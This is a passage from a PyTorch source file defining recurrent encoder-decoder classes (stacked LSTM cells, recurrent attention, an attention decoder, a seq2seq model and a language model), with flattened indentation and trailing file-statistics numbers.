self.embedder = nn.Embedding(vocab_size,
embedding_size,
padding_idx=0)
self.rnn = rnn(embedding_size, self.hidden_size,
num_layers=num_layers, bias=bias,
batch_first=batch_first,
dropout=dropout, bidirectional=False)
self.classifier = nn.Linear(hidden_size, vocab_size)
if tie_embedding:
self.classifier.weight = self.embedder.weight
def forward(self, inputs, hidden=None):
if isinstance(inputs, tuple):
# Lengths data is wrapped inside a Variable.
lengths = inputs[1].data.view(-1).tolist()
emb = pack(self.embedder(inputs[0]), lengths)
else:
emb = self.embedder(inputs)
x, hidden_t = self.rnn(emb, hidden)
if isinstance(inputs, tuple):
x = unpack(x)[0]
        # take the time/batch dims from the rnn output rather than `inputs`,
        # which may be a (sequence, lengths) tuple here
        steps, batch = x.size(0), x.size(1)
        x = x.view(-1, x.size(2))
        x = self.classifier(x)
        x = x.view(steps, batch, -1)
return x, hidden_t
class StackedRecurrentCells(nn.Module):
def __init__(self, input_size, hidden_size, num_layers=1,
dropout=0, bias=True, batch_first=False, rnn_cell=nn.LSTMCell):
super(StackedRecurrentCells, self).__init__()
self.dropout = nn.Dropout(dropout)
self.num_layers = num_layers
self.hidden_size = hidden_size
self.layers = nn.ModuleList()
for _ in range(num_layers):
self.layers.append(rnn_cell(input_size, hidden_size, bias=bias))
input_size = hidden_size
def forward(self, inputs, hidden=None):
def select_layer(h_state, i): # To work on both LSTM / GRU, RNN
if isinstance(h_state, tuple):
return tuple([select_layer(s, i) for s in h_state])
else:
return h_state[i]
if hidden is None:
zeros = inputs.data.new(
self.num_layers, inputs.size(0), self.hidden_size).zero_()
if isinstance(self.layers[0], nn.LSTMCell):
hidden = (Variable(zeros, requires_grad=False),
Variable(zeros, requires_grad=False))
else:
hidden = Variable(zeros, requires_grad=False)
next_hidden = []
for i, layer in enumerate(self.layers):
next_hidden_i = layer(inputs, select_layer(hidden, i))
inputs = next_hidden_i[0] if isinstance(next_hidden_i, tuple) \
else next_hidden_i
if i + 1 != self.num_layers:
inputs = self.dropout(inputs)
next_hidden.append(next_hidden_i)
if isinstance(hidden, tuple):
next_hidden = tuple([torch.stack(h) for h in zip(*next_hidden)])
else:
next_hidden = torch.stack(next_hidden)
return inputs, next_hidden
class RecurrentAttention(nn.Module):
def __init__(self, input_size, hidden_size=128,
num_layers=1, bias=True, batch_first=False, context_size=None,
dropout=0, rnn_cell=nn.LSTMCell, attention=GlobalAttention):
super(RecurrentAttention, self).__init__()
self.layers = num_layers
self.rnn = StackedRecurrentCells(input_size, hidden_size,
num_layers=num_layers, bias=bias,
batch_first=batch_first,
dropout=dropout, rnn_cell=rnn_cell)
self.attn = attention(hidden_size, context_size,
batch_first=batch_first)
self.dropout = nn.Dropout(dropout)
self.hidden_size = hidden_size
def forward(self, inputs, hidden, context, get_attention=False):
outputs = []
attentions = []
for input_t in inputs.split(1):
input_t = input_t.squeeze(0)
output_t, hidden = self.rnn(input_t, hidden)
output_t, attn = self.attn(output_t, context)
output_t = self.dropout(output_t)
outputs += [output_t]
if get_attention:
attentions += [attn]
outputs = torch.stack(outputs)
if get_attention:
attentions = torch.stack(attentions)
return outputs, hidden, attentions
else:
return outputs, hidden
class RecurrentAttentionDecoder(nn.Module):
def __init__(self, vocab_size, hidden_size=128,
num_layers=1, bias=True, batch_first=False,
dropout=0, tie_embedding=False, context_size=None,
rnn_cell=nn.LSTMCell, attention=GlobalAttention):
super(RecurrentAttentionDecoder, self).__init__()
self.layers = num_layers
self.embedder = nn.Embedding(vocab_size,
hidden_size,
padding_idx=0)
self.rnn = RecurrentAttention(hidden_size, hidden_size, context_size=context_size,
num_layers=num_layers, bias=bias, batch_first=batch_first,
dropout=dropout, rnn_cell=rnn_cell, attention=attention)
self.dropout = nn.Dropout(dropout)
self.classifier = nn.Linear(hidden_size, vocab_size)
if tie_embedding:
self.classifier.weight = self.embedder.weight
self.hidden_size = hidden_size
def forward(self, inputs, context, get_attention=False):
context, hidden = context
emb = self.embedder(inputs)
if get_attention:
x, hidden, attentions = self.rnn(
emb, hidden, context, get_attention=get_attention)
else:
x, hidden = self.rnn(emb, hidden, context)
x = x.view(-1, x.size(2))
x = self.classifier(x)
x = x.view(inputs.size(0), inputs.size(1), -1)
if get_attention:
return x, (context, hidden), attentions
else:
return x, (context, hidden)
class RecurrentAttentionSeq2Seq(Seq2Seq):
def __init__(self, vocab_size, hidden_size=256,
num_layers=2, bias=True, dropout=0, tie_embedding=False):
super(RecurrentAttentionSeq2Seq, self).__init__()
self.encoder = RecurrentEncoder(vocab_size, hidden_size=hidden_size,
num_layers=num_layers, bias=bias, dropout=dropout)
self.decoder = RecurrentAttentionDecoder(vocab_size, hidden_size=hidden_size,
tie_embedding=tie_embedding,
num_layers=num_layers, bias=bias, dropout=dropout)
if tie_embedding:
self.encoder.embedder.weight = self.decoder.embedder.weight
def generate(self, inputs, context, get_attention=False):
return self.decoder(inputs, context, get_attention=get_attention)
def bridge(self, context):
context, hidden = context
new_hidden = []
for h in hidden:
if self.encoder.bidirectional:
new_h = bridge_bidirectional_hidden(h)
else:
new_h = h
new_hidden.append(new_h)
return (context, tuple(new_hidden))
class RecurrentLanguageModel(Seq2Seq):
def __init__(self, vocab_size, hidden_size=256,
num_layers=2, bias=True, dropout=0, tie_embedding=False):
super(RecurrentLanguageModel, self).__init__()
self.decoder = RecurrentDecoder(vocab_size, hidden_size=hidden_size,
tie_embedding=tie_embedding,
num_layers=num_layers, bias=bias, dropout=dropout)
def encode(self, *kargs, **kwargs):
return None
| 40.799213
| 99
| 0.596545
|